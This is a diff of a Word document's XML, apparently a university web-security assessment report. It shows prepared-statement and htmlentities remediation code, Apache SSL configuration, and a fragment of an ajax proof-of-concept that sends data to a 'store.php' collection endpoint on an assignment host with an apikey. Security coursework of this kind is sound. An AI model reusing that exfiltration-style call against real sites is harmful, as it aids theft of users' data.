             </w:r>
           </w:p>
           <w:p>
@@ -6413,7 +6481,61 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$stmt-&gt;bind_param("s", $_GET["username"]);</w:t>
+              <w:t>$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>stmt</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>bind_</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>param</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>"s", $_GET["username"]);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6441,7 +6563,43 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$stmt-&gt;execute();</w:t>
+              <w:t>$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>stmt</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>execute(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6469,7 +6627,43 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$stmt-&gt;close();</w:t>
+              <w:t>$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>stmt</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>close(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -7553,7 +7747,27 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>$question = htmlentities($_POST["question"])</w:t>
+              <w:t xml:space="preserve">$question = </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>htmlentities</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>($_POST["question"])</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9343,6 +9557,7 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -9350,7 +9565,37 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>LoadModule ssl_module modules/mod_ssl.so</w:t>
+              <w:t>LoadModule</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>ssl_module</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> modules/mod_ssl.so</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9426,7 +9671,27 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>&lt;VirtualHost *:443&gt;</w:t>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>VirtualHost</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> *:443&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9454,7 +9719,27 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">    ServerName www.example.com</w:t>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>ServerName</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> www.example.com</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9482,7 +9767,27 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">    SSLEngine on</w:t>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>SSLEngine</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> on</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9510,7 +9815,27 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">    SSLCertificateFile "/path/to/www.example.com.cert"</w:t>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>SSLCertificateFile</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> "/path/to/www.example.com.cert"</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9538,7 +9863,27 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">    SSLCertificateKeyFile "/path/to/www.example.com.key"</w:t>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>SSLCertificateKeyFile</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> "/path/to/www.example.com.key"</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9566,7 +9911,27 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>&lt;/VirtualHost&gt;</w:t>
+              <w:t>&lt;/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>VirtualHost</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9732,6 +10097,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
+              <w:keepNext w:val="0"/>
               <w:rPr>
                 <w:b/>
               </w:rPr>
@@ -9836,6 +10202,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
+              <w:keepNext w:val="0"/>
               <w:rPr>
                 <w:b/>
               </w:rPr>
@@ -9916,7 +10283,21 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>Note that the apikey needs to be replace</w:t>
+              <w:t xml:space="preserve">Note that the </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>apikey</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> needs to be replace</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -9951,6 +10332,7 @@
                 <w:szCs w:val="18"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="cm-variable"/>
@@ -9978,6 +10360,7 @@
               </w:rPr>
               <w:t>ajax</w:t>
             </w:r>
+            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="message-body"/>
@@ -10025,7 +10408,67 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>"http://assignment-hermes.unimelb.life/api/store.php?name=%%"</w:t>
+              <w:t>"http://assignment-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-string"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>hermes.unimelb.life</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-string"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-string"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>api</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-string"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-string"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>store.php?name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-string"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>=%%"</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10129,6 +10572,7 @@
                 <w:szCs w:val="18"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="cm-property"/>
@@ -10138,6 +10582,7 @@
               </w:rPr>
               <w:t>apikey</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="message-body"/>
@@ -10197,7 +10642,17 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>}).</w:t>
+              <w:t>}</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>).</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10208,6 +10663,7 @@
               </w:rPr>
               <w:t>done</w:t>
             </w:r>
+            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="message-body"/>
@@ -10346,6 +10802,157 @@
               <w:widowControl w:val="0"/>
               <w:spacing w:line="240" w:lineRule="auto"/>
             </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55BB83D3" wp14:editId="15BD1E2E">
+                  <wp:extent cx="2781541" cy="1219306"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="4" name="Picture 4"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId16"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="2781541" cy="1219306"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29C1E769" wp14:editId="0ED764BD">
+                  <wp:extent cx="3940175" cy="1423670"/>
+                  <wp:effectExtent l="0" t="0" r="3175" b="5080"/>
+                  <wp:docPr id="5" name="Picture 5"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId17"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3940175" cy="1423670"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0278F590" wp14:editId="5010FCE4">
+                  <wp:extent cx="2453853" cy="1615580"/>
+                  <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
+                  <wp:docPr id="3" name="Picture 3"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="3" name="Picture 3"/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId18"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="2453853" cy="1615580"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -10376,6 +10983,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
+              <w:keepNext w:val="0"/>
               <w:rPr>
                 <w:b/>
               </w:rPr>
@@ -10385,6 +10993,7 @@
               <w:rPr>
                 <w:b/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>Impact</w:t>
             </w:r>
             <w:bookmarkEnd w:id="40"/>
@@ -10472,6 +11081,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
+              <w:keepNext w:val="0"/>
               <w:rPr>
                 <w:b/>
               </w:rPr>
@@ -10553,6 +11163,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
+              <w:keepNext w:val="0"/>
               <w:rPr>
                 <w:b/>
               </w:rPr>
@@ -10651,6 +11262,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
+              <w:keepNext w:val="0"/>
               <w:rPr>
                 <w:b/>
               </w:rPr>
@@ -10720,6 +11332,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
+              <w:keepNext w:val="0"/>
               <w:rPr>
                 <w:b/>
               </w:rPr>
@@ -10817,7 +11430,43 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$stmt = $con-&gt;prepare("SELECT * FROM Users WHERE username = ?");</w:t>
+              <w:t>$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>stmt</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = $con-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>prepare(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>"SELECT * FROM Users WHERE username = ?");</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -10845,7 +11494,61 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$stmt-&gt;bind_param("s", $_GET["username"]);</w:t>
+              <w:t>$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>stmt</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>bind_</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>param</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>"s", $_GET["username"]);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -10873,7 +11576,43 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$stmt-&gt;execute();</w:t>
+              <w:t>$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>stmt</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>execute(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -10901,7 +11640,43 @@
                 <w:sz w:val="18"/>
